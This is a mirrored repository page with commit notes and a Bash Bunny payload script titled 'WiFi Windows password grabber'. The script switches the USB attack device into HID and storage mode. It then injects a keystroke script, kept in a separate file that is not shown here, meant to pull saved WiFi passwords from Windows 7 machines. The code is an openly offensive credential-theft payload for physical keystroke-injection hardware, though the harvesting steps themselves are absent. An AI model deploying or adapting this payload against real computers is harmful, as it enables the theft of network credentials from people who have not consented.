mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
* Updated all Payloads for Version 1.2+ Fixed Style Issues on extensions and payloads. Added GET TARGET_OS to get.sh Removed and Fixed all uses ducky_helper.sh (Issue #248) Removed all mention of DUCKY_LANG (Issue #248) Renamed Payloads with spaces in name Added an extension to keep Macs Happy Added a payload for Mac DNS poisoning Fixed Issue #271 changed wget to curl -o Implemented PR #268 Implemented PR #273 * Fixed e.cmd * Fix e.cmd pt2 * Fixed Issues Fixed issues pointed out by @sebkinne Fixed styling errors
37 lines
937 B
Bash
Executable File
37 lines
937 B
Bash
Executable File
#!/bin/bash
|
|
|
|
# @title: WiFi Windows password grabber for the bash bunny
|
|
# @author: Silvian Dragan
|
|
# @props: Siem, Darren Kitchen
|
|
# @version: 1.0
|
|
# @target: Windows 7 (not tested for 8 and above)
|
|
#
|
|
#
|
|
# @details: This is a simple Wifi password grabber tested and working for Windows 7
|
|
# However this has not been tested on Windows 8 and above and any suggestions and
|
|
# improvements are greatly welcomed. Powershell scripting isn't higest skill so
|
|
# I'm sure I'll have much to learn.
|
|
#
|
|
#
|
|
# Colors:
|
|
# Purple: starts the attack payload
|
|
# Green: successful execution
|
|
# Red: failure to load dependency ducky script
|
|
#
|
|
|
|
|
|
ATTACKMODE HID STORAGE
|
|
|
|
LED SETUP
|
|
|
|
GET SWITCH_POSITION
|
|
|
|
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
|
|
QUACK ${SWITCH_POSITION}/ducky_script.txt
|
|
LED FINISH
|
|
else
|
|
LED FAIL
|
|
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
|
|
exit 1
|
|
fi
|